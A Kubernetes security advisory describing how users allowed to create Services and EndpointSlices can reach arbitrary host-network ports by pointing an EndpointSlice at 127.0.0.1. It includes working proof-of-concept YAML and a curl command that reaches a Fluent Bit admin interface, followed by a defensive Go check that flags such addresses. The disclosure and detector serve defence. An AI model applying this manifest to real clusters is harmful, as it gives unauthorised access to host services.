CVSS3: 4.8 Medium
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: HIGH
User Interaction: REQUIRED
Scope: CHANGED
Confidentiality Impact: LOW
Integrity Impact: LOW
Availability Impact: NONE
Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

CVSS2: 4.9 Medium
Access Vector: NETWORK
Access Complexity: MEDIUM
Authentication: SINGLE
Confidentiality Impact: PARTIAL
Integrity Impact: PARTIAL
Availability Impact: NONE
Vector: AV:N/AC:M/Au:S/C:P/I:P/A:N

EPSS: 0.001 Low
Percentile: 23.6%
A user with permission to create Services and EndpointSlices can configure these resources to allow sending traffic to arbitrary ports in the host network.
Any version with EndpointSliceProxying enabled, default in 1.19+
1.19+
Apply YAML:

apiVersion: v1
kind: Service
metadata:
  labels:
    component: apiserver
  name: hijack
  namespace: attacker
spec:
  ports:
  - name: http
    port: 2020
    protocol: TCP
---
addressType: IPv4
apiVersion: discovery.k8s.io/v1beta1
endpoints:
- addresses:
  - 127.0.0.1
  conditions:
    ready: true
kind: EndpointSlice
metadata:
  labels:
    kubernetes.io/service-name: hijack
  name: hijack
  namespace: attacker
ports:
- name: http
  port: 2020
  protocol: TCP
Inside a pod in the cluster, send a curl request to the service:
$ curl hijack.attacker:2020/api/v1/uptime
{"uptime_sec":57070,"uptime_hr":"Fluent Bit has been running: 0 day, 15 hours, 51 minutes and 10 seconds"}
Here I chose to reach the Fluent Bit admin interface running on port 2020 in the host network; any other service can also be hit by adding its port to the Service and EndpointSlice.
This vulnerability does not apply to Endpoints, which would reject this in validation: https://github.com/kubernetes/kubernetes/blob/a651804427dd9a15bb91e1c4fb7a79994e4817a2/pkg/apis/core/validation/validation.go#L5762.
However, EndpointSlice validation is more lenient: https://github.com/kubernetes/kubernetes/blob/a651804427dd9a15bb91e1c4fb7a79994e4817a2/staging/src/k8s.io/apimachinery/pkg/util/validation/validation.go#L356
A user with permission to create Services and EndpointSlices, a relatively unprivileged role, can access arbitrary services in the host network.
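As an added defender-side example (not code from the report or from Kubernetes itself), the check below applies the stricter Endpoints-style address rule to an EndpointSlice document, so an audit script or admission webhook could flag slices like the one above before kube-proxy programs them; the minimal EndpointSlice type and the hijackSlice sample are constructed for this example.

```go
package main

import (
	"encoding/json"
	"fmt"
	"net"
)

// Minimal EndpointSlice shape used by this check (hypothetical, not the k8s API struct).
type EndpointSlice struct {
	Metadata  struct{ Name, Namespace string } `json:"metadata"`
	Endpoints []struct{ Addresses []string } `json:"endpoints"`
}
// specialIPReason mirrors the stricter Endpoints rule: loopback, unspecified and link-local are rejected; "" means acceptable.
func specialIPReason(addr string) string {
	ip := net.ParseIP(addr)
	switch {
	case ip == nil:
		return "not a valid IP address"
	case ip.IsLoopback():
		return "loopback address"
	case ip.IsUnspecified():
		return "unspecified address"
	case ip.IsLinkLocalUnicast() || ip.IsLinkLocalMulticast():
		return "link-local address"
	}
	return ""
}
// CheckEndpointSlice parses an EndpointSlice JSON document and returns one message per address the stricter rule would reject.
func CheckEndpointSlice(doc []byte) ([]string, error) {
	var es EndpointSlice
	if err := json.Unmarshal(doc, &es); err != nil {
		return nil, err
	}
	var out []string
	for i, ep := range es.Endpoints {
		for _, a := range ep.Addresses {
			if r := specialIPReason(a); r != "" {
				out = append(out, fmt.Sprintf("%s/%s endpoints[%d] %s: %s", es.Metadata.Namespace, es.Metadata.Name, i, a, r))
			}
		}
	}
	return out, nil
}
// Constructed sample: the report's loopback slice plus one ordinary pod IP that should pass.
const hijackSlice = `{"kind":"EndpointSlice","metadata":{"name":"hijack","namespace":"attacker"},"endpoints":[{"addresses":["127.0.0.1"]},{"addresses":["10.244.1.7"]}]}`
func main() {
	v, err := CheckEndpointSlice([]byte(hijackSlice))
	fmt.Println(v, err)
}
```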